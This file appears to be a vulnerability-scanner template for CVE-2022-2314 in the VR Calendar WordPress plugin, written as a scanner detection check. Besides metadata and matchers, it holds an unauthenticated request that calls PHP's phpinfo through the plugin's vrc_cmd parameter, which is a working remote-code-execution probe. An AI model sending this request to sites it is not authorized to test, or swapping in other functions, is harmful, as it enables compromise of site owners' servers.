49 lines
1.2 KiB
YAML
49 lines
1.2 KiB
YAML
id: CVE-2022-2314
|
|
|
|
info:
|
|
name: VR Calendar < 2.3.2 - Unauthenticated Arbitrary Function Call
|
|
author: theamanrawat
|
|
severity: critical
|
|
description: |
|
|
The VR Calendar WordPress plugin through 2.3.2 lets any user execute arbitrary PHP functions on the site.
|
|
reference:
|
|
- https://wpscan.com/vulnerability/b22fe77c-844e-4c24-8023-014441cc1e82
|
|
- https://wordpress.org/plugins/vr-calendar-sync/
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-2314
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2022-2314
|
|
metadata:
|
|
verified: "true"
|
|
tags: rce,unauth,wpscan,cve,cve2022,wp,vr-calendar-sync,wordpress,wp-plugin
|
|
|
|
requests:
|
|
- raw:
|
|
- |
|
|
GET /wp-content/plugins/vr-calendar-sync/assets/js/public.js HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
- |
|
|
GET /wp-admin/admin-post.php?vrc_cmd=phpinfo HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
req-condition: true
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body_2
|
|
words:
|
|
- "phpinfo"
|
|
- "PHP Version"
|
|
condition: and
|
|
|
|
- type: word
|
|
part: body_1
|
|
words:
|
|
- "vrc-calendar"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|